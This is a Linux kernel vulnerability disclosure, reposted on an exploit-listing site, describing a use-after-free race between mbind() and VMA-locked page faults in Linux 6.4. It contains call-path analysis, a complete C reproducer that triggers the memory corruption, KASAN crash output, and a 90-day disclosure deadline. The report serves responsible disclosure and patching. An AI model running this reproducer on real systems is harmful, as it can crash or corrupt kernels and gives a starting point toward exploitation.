Share
## https://sploitus.com/exploit?id=1337DAY-ID-39033
Linux 6.4: UAF race between mbind() and VMA-locked page fault

(tested on git master, at commit 57012c57536f)

Summary:

There's a race between mbind() and VMA-locked page faults, leading to UAF.
You can quickly hit this with a straightforward reproducer that just keeps calling mbind() on one thread and causing page faults on another thread.
I'll send a suggested patch in a minute.

mbind() replaces vma->vm_policy while only protected by mmap_write_lock(), which can involve freeing the old vma->vm_policy:

sys_mbind
  kernel_mbind
    do_mbind
      mmap_write_lock
      mbind_range [for each vma in range]
        vma_replace_policy
          new = mpol_dup(...)
          old = vma->vm_policy
          vma->vm_policy = new
          mpol_put(old)
      mmap_write_unlock


VMA-locked page fault handling can allocate pages, which requires using the vma->vm_policy:

do_user_addr_fault
  lock_vma_under_rcu
  handle_mm_fault
    __handle_mm_fault
      handle_pte_fault
         do_pte_missing
           do_anonymous_page
             vma_alloc_zeroed_movable_folio
               vma_alloc_folio
                 get_vma_policy
                   __get_vma_policy
                     pol = vma->vm_policy    ***race***
                     mpol_get(pol) [conditional on MPOL_F_SHARED]
                 [do page allocation]
                 mpol_cond_put(pol)
  vma_end_read

Because of the mpol_cond_put(pol) call, it should be possible for this to manifest as a UAF write.


You can hit this race on a kernel with CONFIG_NUMA and CONFIG_KASAN very quickly (less than a second, I think) with this reproducer - you don't need an actual NUMA system for this, I've tested it in a QEMU VM without NUMA:

==============
// gcc -pthread -o mbind-vs-pf mbind-vs-pf.c -Wall
#define _GNU_SOURCE
#include <pthread.h>
#include <err.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <linux/mempolicy.h>

#define SYSCHK(x) ({          \\
  typeof(x) __res = (x);      \\
  if (__res == (typeof(x))-1L) \\
    err(1, \"SYSCHK(\" #x \")\"); \\
  __res;                      \\
})

static char *vma;

static void *fault_thread(void *arg) {
  while (1) {
    // fault in...
    *vma = 1;
    // ... and zero the PTE again with zap_page_range_single()
    SYSCHK(madvise(vma, 0x1000, MADV_DONTNEED));
  }
}

static void mbind_vma(unsigned long policy) {
  unsigned long nmask = (1UL << 0);
  SYSCHK(syscall(__NR_mbind, vma, 0x1000, policy|0, &nmask, sizeof(nmask)*8+1, 0));
}

int main(void) {
  vma = SYSCHK(mmap((void*)0x100000, 0x1000,
        PROT_READ|PROT_WRITE|PROT_EXEC,
        MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED_NOREPLACE, -1, 0));
  pthread_t thread;
  if (pthread_create(&thread, NULL, fault_thread, NULL))
    errx(1, \"pthread_create\");

  while (1) {
    mbind_vma(MPOL_BIND);
    mbind_vma(MPOL_INTERLEAVE);
  }
}
==============

This will give the following splat:

==================================================================
BUG: KASAN: slab-use-after-free in vma_alloc_folio+0x93/0x220
Read of size 2 at addr ffff888007c0e6f6 by task mbind-vs-pf/556

CPU: 3 PID: 556 Comm: mbind-vs-pf Not tainted 6.5.0-rc3-00123-g57012c57536f #304
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014
Call Trace:
 <TASK>
 dump_stack_lvl+0x36/0x50
 print_report+0xcf/0x660
[...]
 kasan_report+0xc7/0x100
[...]
 vma_alloc_folio+0x93/0x220
 __handle_mm_fault+0x71b/0x1060
[...]
 handle_mm_fault+0xbe/0x280
 do_user_addr_fault+0x196/0x630
 exc_page_fault+0x5c/0xc0
 asm_exc_page_fault+0x26/0x30
[...]
 </TASK>

Allocated by task 555:
 kasan_save_stack+0x33/0x60
 kasan_set_track+0x25/0x30
 __kasan_slab_alloc+0x6e/0x70
 kmem_cache_alloc+0xf5/0x260
 __mpol_dup+0x72/0x1c0
 vma_replace_policy+0x20/0xb0
 do_mbind+0x379/0x510
 kernel_mbind+0x11a/0x130
 do_syscall_64+0x3b/0x90
 entry_SYSCALL_64_after_hwframe+0x6e/0xd8

Freed by task 555:
 kasan_save_stack+0x33/0x60
 kasan_set_track+0x25/0x30
 kasan_save_free_info+0x2b/0x50
 __kasan_slab_free+0x10a/0x180
 kmem_cache_free+0xaa/0x380
 vma_replace_policy+0x87/0xb0
 do_mbind+0x379/0x510
 kernel_mbind+0x11a/0x130
 do_syscall_64+0x3b/0x90
 entry_SYSCALL_64_after_hwframe+0x6e/0xd8
[...]
==================================================================

If I leave the reproducer running some more, I get other crashes, like in the KASAN internals, that suggest that the reproducer is already causing memory corruption.

In case you're curious: I found this by grepping for mmap_write_lock*() calls and looking at most of them to figure out if they do anything interesting to VMAs without taking VMA locks.


This bug is subject to a 90-day disclosure deadline. If a fix for this
issue is made available to users before the end of the 90-day deadline,
this bug report will become public 30 days after the fix was made
available. Otherwise, this bug report will become public at the deadline.
The scheduled deadline is 2023-10-26.